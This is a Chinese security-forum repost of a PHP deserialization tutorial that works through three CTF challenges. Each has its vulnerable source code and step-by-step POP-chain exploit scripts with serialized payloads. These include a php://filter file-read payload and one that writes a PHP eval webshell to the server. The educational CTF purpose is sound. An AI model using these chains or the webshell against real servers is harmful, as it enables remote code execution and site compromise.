设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 经验分享 | PHP-反序列化(超细的)(下) ...
返回列表 发新帖
查看: 2361|回复: 0

经验分享 | PHP-反序列化(超细的)(下)

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-7-10 11:55:03 | 显示全部楼层 |阅读模式
原文链接:经验分享 | PHP-反序列化(超细的
例2:[MRCTF2020]Ezpop
  1. <?php

  3. class Modifier {
  4.     protected  $var;
  5.     public function append($value){
  6.         include($value);
  7.     }
  8.     public function __invoke(){
  9.         $this->append($this->var);
  10.     }
  11. }

  13. class Show{
  14.     public $source;
  15.     public $str;
  16.     public function __construct($file='index.php'){
  17.         $this->source = $file;
  18.         echo 'Welcome to '.$this->source."<br>";
  19.     }
  20.     public function __toString(){
  21.         return $this->str->source;
  22.     }

  24.     public function __wakeup(){
  25.         if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
  26.             echo "hacker";
  27.             $this->source = "index.php";
  28.         }
  29.     }
  30. }

  32. class Test{
  33.     public $p;
  34.     public function __construct(){
  35.         $this->p = array();
  36.     }

  38.     public function __get($key){
  39.         $function = $this->p;
  40.         return $function();
  41.     }
  42. }

  44. if(isset($_GET['pop'])){
  45.     @unserialize($_GET['pop']);
  46. }
  47. else{
  48.     $a=new Show;
  49.     highlight_file(__FILE__);
  50. }
复制代码

首先看看所涉及到的魔术方法:
__construct()  当一个对象创建时被调用
__toString()  当一个对象被当作一个字符串使用
__wakeup()  将在反序列化之后立即被调用
__get()  访问不存在的成员变量时调用的
__invoke()  将对象当作函数来使用时执行此方法
我们可以先一个一个类看看怎么利用
Modifier类:
  1. <?php

  3. highlight_file(__FILE__);

  5. class Modifier {
  6.     protected  $var = 'info.php';

  8.     public function append($value){
  9.         include($value);
  10.     }

  12.     public function __invoke(){
  13.         echo '__invoke'."<br>";
  14.         $this->append($this->var);
  15.     }
  16. }

  18. $a = new Modifier();
  19. $a();
复制代码

这里假设需要 include 的文件是info.php
简单解释一下代码的意思,就是我们需要执行append方法,若需要执行该方法可通过__invoke方法执行,也就是当将对象当作函数来使用时执行__invoke方法
所以我们就可以先创建这个对象然后再拿来当函数使用,就会自动触发__invoke方法,从而就可以执行append方法包含info.php文件
运行结果:

接下来是Test类:
  1. class Test{
  2.     public $p;
  3.     public function __construct(){
  4.         $this->p = array();
  5.     }

  7.     public function __get($key){
  8.         $function = $this->p;
  9.         return $function();
  10.     }
  11. }
复制代码


首先是__construct方法初始化设置p是一个数组,这显然不是我们需要的,但我们可以重新初始化,然后是__get方法,访问不存在的成员变量时调用,而且返回的是方法,这不就可以配合第一个Modifier类使用了吗,使用Test类的__get方法调用Modifier类,所以我们可以使Test类初始化将$p的值设为Modifier对象,然后再经过__get方法以函数的方式执行Modifier对象(即访问一个Test类不存在的属性),这样就可以使用Modifier对象的append方法了,如下:
  1. <?php

  3. class Modifier {
  4.     protected  $var = 'info.php';

  6.     public function append($value){
  7.         include($value);
  8.     }

  10.     public function __invoke(){
  11.         echo '__invoke'."<br>";
  12.         $this->append($this->var);
  13.     }
  14. }


  17. class Test{
  18.     public $p;
  19.     public function __construct(){
  20.         $this->p = new Modifier();
  21.     }

  23.     public function __get($key){
  24.         $function = $this->p;
  25.         return $function();
  26.     }
  27. }

  29. $a  = new Test();
  30. $a->no;
  31. ?>
复制代码


运行结果:

最后是这个Show类:
  1. class Show{
  2.     public $source;
  3.     public $str;
  4.     public function __construct($file='index.php'){
  5.         $this->source = $file;
  6.         echo 'Welcome to '.$this->source."<br>";
  7.     }
  8.     public function __toString(){
  9.         return $this->str->source;
  10.     }

  12.     public function __wakeup(){
  13.         if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
  14.             echo "hacker";
  15.             $this->source = "index.php";
  16.         }
  17.     }
  18. }
复制代码

首先使用unserialize会先触发__wakeup方法,这个方法在这里其实就是充当过滤字符,接着是初始化方法,这个方法有个关键的地方就是使用了echo打印字符串,并且将source拼接起来打印,而__toString() 就是当一个对象被当作一个字符串时调用,正好可以利用初始化方法的echo去完成调用。分析了这么多,最后就可以构造最终的pop链了,先上payload再继续讲
  1. <?php

  3. class Modifier {
  4.     protected  $var = 'info.php';
  5. }

  7. class Show{
  8.     public $source;
  9.     public $str;
  10.     public function __construct($file){
  11.         $this->source = $file;
  12.         echo 'Welcome to '.$this->source."<br>";
  13.     }
  14.     public function __toString(){
  15.         return "566";
  16.     }
  17. }

  19. class Test{
  20.     public $p;
  21.     public function __construct(){
  22.         $this->p = new Modifier();
  23.     }
  24. }

  26. $a = new Show('spaceman');
  27. $a->str = new Test();
  28. $c = new Show($a);
  29. echo serialize($c);
复制代码


运行结果有不可显示字符%00这里我手动加上了,所以可以使用urlencode一下,我这里是为了更直观的查看所以直接序列化

  1. Welcome to spaceman
  2. Welcome to 566
  3. O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";s:8:"spaceman";s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:8:"info.php";}}}s:3:"str";N;}
  4. $a = new Show('spaceman');
复制代码

首先是new一个Show对象,然后初始化source的值,如spaceman等字符,这个没多大影响,只是为了调用Test类中的__get方法,那如何调用的呢$a->str = new Test();
将Show类的str属性设为new Test()
$c = new Show($a);
然后再用Show类初始化刚刚构造的Show类,这里可能就有点绕了,为何我们需要这样构造呢,因为我们需要触发Show的__toString()方法,让str能调用source,而经过刚刚的赋值,str为new Test(),source为new Show('spaceman')中的 spaceman ,那么__toString方法中的str->source就是访问Test类中的spaceman属性,然而Test类没有spaceman属性,那么就会触发__get方法,而该方法又会触发Modifier类中的__invoke方法,最后就完成了include
所以大概调用的过程是:
Show::__toString()-->Test::__get()-->Modifier::__invoke()执行结果:

当然这是文件包含,那么想要读取文件应该怎么办呢,可以php伪协议使用,所以可以这样构造读取文件
​​
  1. <?php

  3. class Modifier {
  4.     protected  $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
  5. }

  7. class Show{
  8.     public $source;
  9.     public $str;
  10.     public function __construct($file){
  11.         $this->source = $file;
  12.         echo 'Welcome to '.$this->source."<br>";
  13.     }
  14.     public function __toString(){
  15.         return "566";
  16.     }
  17. }

  19. class Test{
  20.     public $p;
  21.     public function __construct(){
  22.         $this->p = new Modifier();
  23.     }
  24. }

  26. $a = new Show('spaceman');
  27. $a->str = new Test();
  28. $c = new Show($a);
  29. echo serialize($c);

  31. //O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";s:8:"spaceman";s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}s:3:"str";N;}
复制代码

运行结果:
执行:

最后base64解码即可
例3:
ctfshow 反序列化web261
  1. <?php

  3. highlight_file(__FILE__);

  5. class ctfshowvip{
  6.     public $username;
  7.     public $password;
  8.     public $code;

  10.     public function __construct($u,$p){
  11.         $this->username=$u;
  12.         $this->password=$p;
  13.     }
  14.     public function __wakeup(){
  15.         if($this->username!='' || $this->password!=''){
  16.             die('error');
  17.         }
  18.     }
  19.     public function __invoke(){
  20.         eval($this->code);
  21.     }

  23.     public function __sleep(){
  24.         $this->username='';
  25.         $this->password='';
  26.     }
  27.     public function __unserialize($data){
  28.         $this->username=$data['username'];
  29.         $this->password=$data['password'];
  30.         $this->code = $this->username.$this->password;
  31.     }
  32.     public function __destruct(){
  33.         if($this->code==0x36d){
  34.             file_put_contents($this->username, $this->password);
  35.         }
  36.     }
  37. }

  39. unserialize($_GET['vip']);
复制代码


首先呢了解一个上文没讲过的__unserialize()方法, 反序列化函数,用于序列化的SET类型数据。如果参数不是序列化的SET,那么会直接返回。如果是一个序列化的SET,但不是PHP-REDIS序列化的格式,函数将抛出一个异常。
Examples:
  1. $redis->setOpt(Redis::OPT_SERIALIZER, Redis::SERIALIZER_PHP);
  2. $redis->_unserialize('a:3:{i:0;i:1;i:1;i:2;i:2;i:3;}'); // Will return Array(1,2,3)
复制代码

所以我们此时应该先想怎么序列化__sleep()serialize之前被调用,可以指定要序列化的对象属性。所以在反序列化的时候就没啥用了,我们自己序列化的时候也不加,而__unserialize在序列化的时候也用不到,__wakeup是反序列化恢复对象之前调用的方法,所以跟序列化也没啥关系,__invoke() 是将对象当作函数来使用时执行此方法,但是我发现并不需要调用此方法,因为__destruct()方法中有file_put_contents函数可以写文件,所以我们需要满足 code==0x36d 即可将文件写入,这里不难发现是弱类型比较,所以887.php==0x36d是成立的,所以我们可以直接构造如下:
  1. <?php
  2. class ctfshowvip{
  3.     public $username;
  4.     public $password;

  6.     public function __construct($u,$p){
  7.         $this->username=$u;
  8.         $this->password=$p;
  9.     }
  10. }
  11. $a = new ctfshowvip('877.php','<?php eval($_POST[1]);?>');
  12. echo serialize($a);
复制代码

为什么可以直接这样构造而不被__wakeup()拦截呢,因为含有__unserialize(),就是当一个类中同时含有这两个方法时只有__unserialize生效,而__wakeup()失效,如下:
  1. <?php

  3. highlight_file(__FILE__);

  5. class ctfshowvip{
  6.     public $username;
  7.     public $password;
  8.     public $code;

  10.     public function __construct($u,$p){
  11.       echo "__construct()<br>";
  12.         $this->username=$u;
  13.         $this->password=$p;
  14.     }

  16.     public function __wakeup(){
  17.       echo "__wakeup()<br>";
  18.         if($this->username!='' || $this->password!=''){
  19.             die('error');
  20.         }
  21.     }

  23.     public function __invoke(){
  24.       echo "__invoke()<br>";
  25.         eval($this->code);
  26.     }

  28.     public function __sleep(){
  29.       echo "__sleep()<br>";
  30.         $this->username='';
  31.         $this->password='';
  32.     }

  34.     public function __unserialize($data){
  35.       echo "__unserialize()<br>";
  36.         $this->username=$data['username'];
  37.         $this->password=$data['password'];
  38.         $this->code = $this->username.$this->password;
  39.         var_dump($data);
  40.         echo "<br>";
  41.         echo $this->code;
  42.         echo "<br>";

  44.     }

  46.     public function __destruct(){
  47.       echo "__destruct()<br>";
  48.         if($this->code==0x36d){
  49.           echo "file_put_contents-----good!<br>";
  50.         }
  51.     }
  52. }

  54. unserialize($_GET['vip']);
  55. 运行结果:

  57. __unserialize()
  58. array(2) { ["username"]=> string(7) "877.php" ["password"]=> string(24) "<?php eval($_POST[1]);?>" }
  59. 877.php
  60. __destruct()
  61. file_put_contents-----good!
  62. 成功写入木马,剩下的操作就不说了
复制代码


例4:
2021蓝帽杯半决赛-杰克与肉丝
源码:
  1. <?php
  2. highlight_file(__file__);     
  3. class Jack   
  4. {
  5.     private $action;   
  6.     function __set($a, $b)
  7. {
  8.         $b->$a();
  9.     }
  10. }
  11. class Love {
  12.     public $var;
  13.     function __call($a,$b)
  14. {
  15.         $rose = $this->var;
  16.         call_user_func($rose);
  17.     }
  18.     private function action(){
  19.         echo "jack love rose";
  20.     }
  21. }
  22. class Titanic{
  23.     public $people;
  24.     public $ship;
  25.     function __destruct(){
  26.         $this->people->action=$this->ship;
  27.     }
  28. }
  29. class Rose{
  30.     public $var1;
  31.     public $var2;
  32.     function __invoke(){
  33.         //if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
  34.             eval($this->var1);
  35.         //}
  36.     }
  37. }
  38. if(isset($_GET['love'])){
  39.     $sail=$_GET['love'];
  40.     unserialize($sail);
  41. }
  42. ?>
复制代码

为了不受其他因素干扰,我先把这个Rose类__invoke函数的if语句注释,就是为了更方便的看看怎么构造的,所以首先我们应该直接寻找我们最后利用的函数eval,然后利用逆推的方式,看看是如何触发该函数的,就是看看怎么调用的,invoke() 将对象当作函数来使用时执行此方法,所以刚刚开始我们依旧可以慢慢一步一步测试分析,慢慢一步一步调用
  1. <?php

  3. class Rose{
  4.     public $var1 = "phpinfo();";
  5.     public $var2;
  6.     function __invoke(){
  7.             eval($this->var1);
  8.     }
  9. }

  11. $a  = new Rose();
  12. echo $a->var1;
  13. $a();
复制代码



现在是构造出来了,接着是看看怎么才能调用这个类,而Love类有一个是函数以函数的方式,call_user_func 是把第一个参数作为回调函数调用,正好符合了我们需要构造的,所以我们又看一下这个函数是怎么触发的,__call 当调用对象中不存在的方法会自动调用该方法,由于call_user_func回调的参数是$rose,$rose又是直接等于$var,所以我们需要先给$var赋值,这个值就是Rose类,这样call_user_func回调时就拿Rose类当函数执行,这样就可以出发Rose类的eval了
  1. <?php

  3. class Love{
  4.     public $var;
  5.     function __call($a,$b)
  6. {
  7.         $rose = $this->var;
  8.         echo "$a function not find!<br>";
  9.         call_user_func($rose);
  10.     }
  11.     private function action(){
  12.         echo "jack love rose";
  13.     }
  14. }

  16. class Rose{
  17.     public $var1 = "phpinfo();";
  18.     public $var2;
  19.     function __invoke(){
  20.         echo $this->var1;
  21.             eval($this->var1);
  22.     }
  23. }

  25. $a = new Rose();
  26. $b = new Love();
  27. $b->var = $a;
  28. $b->spaceman(566); //不存在的spaceman函数
复制代码



然后我们继续寻找一下如何在别的类里找一个不存在的函数,$b->spaceman(566) 这样的形式Jack类就有,正好又可以构造了,然后我们再看一下怎么触发Jack类中的这个形式,__set 设置对象不存在的属性或无法访问(私有)的属性时调用,这里的$action是私有的,所以我们可以利用这个action
  1. <?php

  3. class Jack{
  4.     private $action;   
  5.     function __set($a, $b)
  6. {
  7.       echo "good! I run!<br>";
  8.         $b->$a();
  9.     }
  10. }

  12. class Love{
  13.     public $var;
  14.     function __call($a,$b)
  15. {
  16.         $rose = $this->var;
  17.         echo "$a function not find!<br>";
  18.         call_user_func($rose);
  19.     }
  20.     private function action(){
  21.         echo "jack love rose";
  22.     }
  23. }

  25. class Rose{
  26.     public $var1 = "phpinfo();";
  27.     public $var2;
  28.     function __invoke(){
  29.         echo $this->var1;
  30.             eval($this->var1);
  31.     }
  32. }

  34. $a = new Rose();
  35. $b = new Love();
  36. $b->var = $a;
  37. $c = new Jack();
  38. $c->action = $b;
复制代码

其实这里不用action其实也是可以的,随便一个名字都行,但是这里用action是因为等下需要,因为我们需要利用这个action,那么就是接下来怎么触发这个Jack类了,源码中只有一个unserialize,而要想触发这一系列的类,只有Titanic类符合开始的条件,因为只有Titanic类的__destruct魔法函数触发,所以这就是我们序列化的入口,__destruct当对象所在函数调用完毕后执行。最后就是用Titanic类将这些类都连接在一起
  1. <?php

  3. class Titanic{
  4.     public $people;
  5.     public $ship;
  6.     function __destruct(){
  7.         $this->people->action=$this->ship;
  8.     }
  9. }

  11. class Jack{
  12.     private $action;   
  13.     function __set($a, $b)
  14. {
  15.       echo "good! I run!<br>";
  16.         $b->$a();
  17.     }
  18. }

  20. class Love{
  21.     public $var;
  22.     function __call($a,$b)
  23. {
  24.         $rose = $this->var;
  25.         echo "$a function not find!<br>";
  26.         call_user_func($rose);
  27.     }
  28.     private function action(){
  29.         echo "jack love rose";
  30.     }
  31. }

  33. class Rose{
  34.     public $var1 = "phpinfo();";
  35.     public $var2;
  36.     function __invoke(){
  37.         echo $this->var1;
  38.             eval($this->var1);
  39.     }
  40. }

  42. $s = new Titanic();
  43. $s->people = new Jack();
  44. $s->ship = new Love();
  45. $s->ship->var = new Rose();
  46. echo urlencode(serialize($s));
  47. echo "<br>";
复制代码



最后将序列化后得到的数据输入源码中即可

结束语哈哈哈,下次一定好好更新,下次一定
本次主要是讲了php反序列中常用魔术方法怎么触发以及怎么构造pop链,在实战中有的漏洞就是通过源码审计反序列化来导致RCE的,比如thinkphp5.1.*就存在一个RCE的pop链,这个我之后也会进行更新,构造pop链就是需要耐心也细心,一开始都不容易,我个人使用的是逆推的方法,就是从最后的命令执行往前推,需要啥就找啥,有的师傅是习惯从头到尾,我比较菜,只能从后面慢慢测试慢慢往前推,最后感谢关注我的朋友们,我会更加努力学习,尽量帮师傅们更快掌握一些知识,以后会尽量更新文章,谢谢师傅们!




回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 10:42 , Processed in 0.013594 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表